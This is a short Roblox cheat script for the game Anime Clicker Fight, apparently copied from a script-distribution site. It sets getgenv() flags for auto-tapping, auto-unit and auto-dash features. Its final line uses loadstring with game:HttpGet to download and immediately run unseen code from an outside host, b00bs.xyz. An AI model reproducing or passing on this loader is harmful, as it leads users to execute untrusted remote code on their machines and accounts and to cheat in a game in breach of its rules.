Thank you for using our website
Your script:
NO KEY
--[[
__ __.__ .___ .__ __
/ / __|_____ ____ __| _/ ________ __|__|/ |_
// / ____ _/ __ / __ | ______ / ____/ | __
/| | |_> > ___// /_/ | /_____/ < <_| | | / || |
__/ / |__| __/ ___ >____ | __ |____/|__||__|
/ |__| / / |__|
_Hey there! (V 0.1.0) </ 2022 created by quit
_Lua script for [🍥UPD2]Anime Clicker Fight made 11/14/2022
</ autoTap is instant, autoUnit is every 30sec, autoDash is instant
</ autoUnit sometimes breaks autoDash, simply disable and enable both you will get it to work
--]]
--</ enabling a feature by adding true | disableing a feature by adding false
getgenv().autoTap = true;
getgenv().autoBestUnit = false;
getgenv().autoDash = false;
loadstring(game:HttpGet("https://b00bs.xyz/u/",true))();